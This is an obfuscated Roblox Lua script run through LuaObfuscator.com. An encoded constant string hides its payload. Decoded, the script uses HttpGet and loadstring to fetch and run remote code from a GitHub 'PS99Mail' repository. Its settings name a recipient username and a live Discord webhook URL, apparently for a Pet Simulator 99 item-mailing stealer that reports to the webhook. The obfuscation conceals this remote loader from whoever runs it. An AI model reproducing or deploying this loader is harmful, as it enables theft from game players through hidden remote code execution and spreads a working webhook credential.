--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v80=(v31/(((11 -6) -(5 -2))^(v32-(878 -(282 + 595)))))%((5 -3)^(((v33-((1 -0) -(350 -(87 + 263)))) -(v32-(1 -0))) + (2 -1))) ;return v80-(v80%(1271 -(226 + 1044))) ;else local v81=0 -(180 -(67 + 113)) ;local v82;while true do if (v81==(619 -(555 + 64))) then v82=(933 -(857 + 55 + 19))^(v32-(569 -(367 + 201))) ;return (((v31%(v82 + v82))>=v82) and (928 -(214 + 713))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (7 -4) );v19=v19 + (7 -4) + 1 ;return (v37 * (66680831 -49903615)) + (v36 * 65536) + (v35 * (1208 -(802 + 150))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==0) then v39=380 -(339 + 41) ;v40=nil;v38=1;end if (v38==(2 + 1)) then v45=nil;while true do local v88=405 -(118 + 287) ;while true do if (v88~=(0 -0)) then else if (v39==(2 + 0)) then local v108=0;while true do if (v108==0) then local v142=396 -(115 + 281) ;while true do if (v142==(2 -1)) then v108=1 + 0 ;break;end if (v142==0) then for v160=378 -(142 + 235) ,v44 do local v161=0 -0 ;local v162;local v163;local v164;local v165;while true do if (v161==0) then v162=0 -0 ;v163=nil;v161=978 -(553 + 424) ;end if (v161==(868 -(550 + 317))) then local v167=0 -0 ;while true do if (v167~=(1 -0)) then else v161=2 + 0 ;break;end if (v167==(0 -0)) then v164=nil;v165=nil;v167=286 -(134 + 151) ;end end end if (v161==(2 + 0)) then while true do if (1~=v162) then else v165=nil;while true do if (v163~=(1665 -(970 + 695))) then else local v178=0 -0 ;local v179;while true do if (v178==(1990 -(582 + 1408))) then v179=0;while true do if (v179~=(3 -2)) then else v163=1;break;end if (v179~=0) then else local v183=0 -0 ;local v184;while true do if (v183~=(0 -0)) then else v184=1824 -(1195 + 629) ;while true do if (v184==(0 -0)) then v164=v22();v165=nil;v184=242 -(187 + 54) ;end if (v184==(2 -1)) then v179=2 -1 ;break;end end break;end end end end break;end end end if (1==v163) then if (v164==(1 + 0)) then v165=v22()~=(780 -(162 + 618)) ;elseif (v164==(2 + 0)) then v165=v25();elseif (v164==(2 + 1)) then v165=v26();end v45[v160]=v165;break;end end break;end if (v162~=(753 -(239 + 514))) then else local v170=0 -0 ;while true do if (v170==(1 + 0)) then v162=1 -0 ;break;end if (v170==(0 + 0)) then v163=0 + 0 ;v164=nil;v170=1637 -(1373 + 263) ;end end end end break;end end end v43[1003 -(451 + 549) ]=v22();v142=1 + 0 ;end end end if (v108==(1 -0)) then for v153=1 -0 ,v24() do local v154=1130 -(369 + 761) ;local v155;local v156;local v157;while true do if (v154==(1384 -(746 + 638))) then local v166=0 + 0 ;while true do if (v166==(1 + 0)) then v154=1 -0 ;break;end if (v166==(341 -(218 + 123))) then v155=0 -0 ;v156=nil;v166=1582 -(1535 + 46) ;end end end if (v154~=1) then else v157=nil;while true do if (v155==(239 -(64 + 174))) then while true do if (v156~=(0 + 0)) then else v157=v22();if (v21(v157,1 + 0 ,1)~=0) then else local v171=0;local v172;local v173;local v174;local v175;local v176;local v177;while true do if ((562 -(306 + 254))~=v171) then else v176=nil;v177=nil;v171=1 + 2 ;end if (v171==(1 -0)) then v174=nil;v175=nil;v171=2;end if (v171==0) then v172=1467 -(899 + 568) ;v173=nil;v171=1 + 0 ;end if (3~=v171) then else while true do if (v172==(4 -2)) then v177=nil;while true do if (v173~=(337 -(144 + 192))) then else local v185=603 -(268 + 335) ;local v186;while true do if (v185==0) then v186=0;while true do if (v186==(290 -(60 + 230))) then v176=nil;v177=nil;v186=217 -(42 + 174) ;end if (v186==1) then v173=2 + 0 ;break;end end break;end end end if (v173==2) then while true do if (v174==(575 -(426 + 146))) then if (v21(v176,3 + 0 ,1 + 2 )==1) then v177[1460 -(282 + 1174) ]=v45[v177[815 -(569 + 242) ]];end v40[v153]=v177;break;end if (v174==(5 -3)) then local v189=0 + 0 ;local v190;local v191;while true do if ((1 + 0)~=v189) then else while true do if (v190~=(1024 -(706 + 318))) then else v191=1251 -(721 + 530) ;while true do if (v191==0) then if (v21(v176,1,1976 -(1913 + 62) )==1) then v177[1273 -(945 + 326) ]=v45[v177[4 -2 ]];end if (v21(v176,2 + 0 ,1935 -(565 + 1368) )==(3 -2)) then v177[1664 -(1477 + 184) ]=v45[v177[703 -(271 + 429) ]];end v191=1 + 0 ;end if (v191==(1501 -(1408 + 92))) then v174=1089 -(461 + 625) ;break;end end break;end end break;end if (v189==(0 + 0)) then v190=1288 -(993 + 295) ;v191=nil;v189=1 + 0 ;end end end if (v174==(0 -0)) then local v192=0;local v193;while true do if (v192~=(1171 -(418 + 753))) then else v193=0;while true do if (v193==(0 + 0)) then local v200=0 + 0 ;local v201;while true do if (0~=v200) then else v201=0 + 0 ;while true do if (v201==(477 -(41 + 435))) then v193=1002 -(938 + 63) ;break;end if (v201~=(0 + 0)) then else local v207=529 -(406 + 123) ;while true do if (v207~=(1 + 0)) then else v201=1770 -(1749 + 20) ;break;end if ((0 + 0)==v207) then v175=v21(v157,1324 -(1249 + 73) ,2 + 1 );v176=v21(v157,3 + 1 ,1151 -(466 + 679) );v207=1;end end end end break;end end end if (v193~=(2 -1)) then else v174=1139 -(782 + 356) ;break;end end break;end end end if (v174==(2 -1)) then local v194=0 -0 ;local v195;local v196;while true do if ((1900 -(106 + 1794))==v194) then v195=0 + 0 ;v196=nil;v194=1;end if (v194==(1093 -(975 + 117))) then while true do if (v195==0) then v196=0 + 0 ;while true do if (v196==(2 -1)) then v174=5 -3 ;break;end if (v196==(0 + 0)) then local v202=0 -0 ;while true do if (v202~=(0 -0)) then else v177={v23(),v23(),nil,nil};if (v175==(103 -(17 + 86))) then local v208=0;while true do if (v208~=(0 + 0)) then else v177[6 -3 ]=v23();v177[4]=v23();break;end end elseif (v175==(2 -1)) then v177[2 + 1 ]=v24();elseif (v175==2) then v177[169 -(122 + 44) ]=v24() -((2 -0)^(52 -36)) ;elseif (v175==(3 + 0)) then local v213=0 -0 ;local v214;while true do if (v213==0) then v214=0 + 0 ;while true do if (v214~=0) then else v177[5 -2 ]=v24() -(2^16) ;v177[4]=v23();break;end end break;end end end v202=66 -(30 + 35) ;end if (v202==(1 + 0)) then v196=1258 -(1043 + 214) ;break;end end end end break;end end break;end end end end break;end if (v173==0) then local v187=611 -(602 + 9) ;while true do if (v187==1) then v173=1190 -(449 + 740) ;break;end if (v187==0) then local v197=872 -(826 + 46) ;while true do if (v197~=(948 -(245 + 702))) then else v187=3 -2 ;break;end if (v197~=(0 + 0)) then else v174=0 -0 ;v175=nil;v197=1213 -(323 + 889) ;end end end end end end break;end if (v172==(440 -(382 + 58))) then local v181=0 -0 ;while true do if (v181==(580 -(361 + 219))) then v173=0 + 0 ;v174=nil;v181=321 -(53 + 267) ;end if (v181==(1 + 0)) then v172=1206 -(902 + 303) ;break;end end end if (1~=v172) then else local v182=413 -(15 + 398) ;while true do if (v182~=(983 -(18 + 964))) then else v172=7 -5 ;break;end if (v182==(0 -0)) then v175=nil;v176=nil;v182=1 + 0 ;end end end end break;end end end break;end end break;end if (v155~=0) then else v156=0 + 0 ;v157=nil;v155=215 -(22 + 192) ;end end break;end end end v39=3;break;end end end if (v39~=(684 -(483 + 200))) then else local v109=0;while true do if (v109==(1464 -(1404 + 59))) then v45={};v39=852 -(20 + 830) ;break;end if (v109~=(0 + 0)) then else v43={v40,v41,nil,v42};v44=v24();v109=127 -(116 + 10) ;end end end v88=1 + 0 ;end if (v88==(739 -(542 + 196))) then if (v39==(1 + 2)) then local v110=0 -0 ;local v111;while true do if (v110~=(236 -(141 + 95))) then else v111=0;while true do if (v111~=0) then else local v159=0 + 0 ;while true do if (v159~=(0 + 0)) then else for v168=1,v24() do v41[v168-(1 + 0) ]=v29();end return v43;end end end end break;end end end if (v39==(0 -0)) then v40={};v41={};v42={};v39=1 + 0 ;end break;end end end break;end if (v38~=1) then else v41=nil;v42=nil;v38=4 -2 ;end if ((4 -2)==v38) then v43=nil;v44=nil;v38=8 -5 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1 + 0 ;local v49=(v21(v47,1 + 0 ,28 -8 ) * ((2 + 0)^(195 -(92 + 71)))) + v46 ;local v50=v21(v47,11 + (29 -19) ,51 -20 );local v51=((v21(v47,32)==1) and  -(766 -(574 + (265 -74)))) or (1 + 0) ;if (v50==(0 -0)) then if (v49==(0 + 0 + 0)) then return v51 * (849 -(254 + 595)) ;else v50=127 -(55 + 71) ;v48=0 -0 ;end elseif (v50==2047) then return ((v49==(1790 -(573 + 1217))) and (v51 * ((2 -1)/((0 -0) + 0)))) or (v51 * NaN) ;end return v8(v51,v50-1023 ) * (v48 + (v49/((2 -0)^(991 -(714 + 225))))) ;end v26=nil;function v26(v52)local v53=806 -(118 + 688) ;local v54;local v55;while true do if (v53==(49 -(25 + 23))) then v54=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;v53=1888 -(927 + (2338 -1379)) ;end if (0==v53) then v54=nil;if  not v52 then v52=v24();if (v52==0) then return "";end end v53=1;end if (v53==((291 -(175 + 110)) -4)) then v55={};for v89=733 -(16 + 716) , #v54 do v55[v89]=v2(v1(v3(v54,v89,v89)));end v53=5 -2 ;end if (v53==(100 -(11 + 86))) then return v6(v55);end end end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (4 -2) );v19=v19 + 2 ;return (v58 * (1262 -1006)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v59,16));if v20 then local v95=0;local v96;while true do if (v95==1) then return v96;end if (v95==0) then v96=v5(v84,v20);v20=nil;v95=1;end end else return v84;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=5) then if (v79<=2) then if (v79<=0) then v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v70=v78[3];elseif (v79>1) then local v112;local v113,v114;local v115;local v116;v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end v70=v70 + 1 ;v78=v66[v70];if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end v70=v70 + 1 ;v78=v66[v70];v116=v78[2];v115=v76[v78[3]];v76[v116 + 1 ]=v115;v76[v116]=v115[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v116=v78[2];v113,v114=v69(v76[v116](v13(v76,v116 + 1 ,v78[3])));v71=(v114 + v116) -1 ;v112=0;for v136=v116,v71 do v112=v112 + 1 ;v76[v136]=v113[v112];end v70=v70 + 1 ;v78=v66[v70];v116=v78[2];v76[v116]=v76[v116](v13(v76,v116 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v70=v78[3];else local v126=v78[2];v76[v126]=v76[v126](v13(v76,v126 + 1 ,v71));end elseif (v79<=3) then v62[v78[3]]=v76[v78[2]];elseif (v79>4) then do return;end elseif ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end elseif (v79<=8) then if (v79<=6) then local v103=v78[2];local v104=v76[v78[3]];v76[v103 + 1 ]=v104;v76[v103]=v104[v78[4]];elseif (v79>7) then local v128=v78[2];local v129,v130=v69(v76[v128](v13(v76,v128 + 1 ,v78[3])));v71=(v130 + v128) -1 ;local v131=0;for v139=v128,v71 do v131=v131 + 1 ;v76[v139]=v129[v131];end elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=10) then if (v79==9) then v76[v78[2]]=v78[3];else v76[v78[2]]=v78[3]~=0 ;end elseif (v79==11) then v76[v78[2]]();else v70=v78[3];end v70=v70 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726903083O00557365726E616D6503073O0050756C626F313203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O303639383139373934313639383539302F6166686279677A67426C5666646247415A4C4A70656273597358736E6F3768544C544D646158465F4571734A4F47414879654D56374F735A3045785A494249344E3O5200163O0012093O00013O0026073O000D0001000200040C3O000D00012O000A000100013O001202000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026073O00010001000100040C3O00010001001209000100093O00122O000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00053O00017O00",v9(),...)
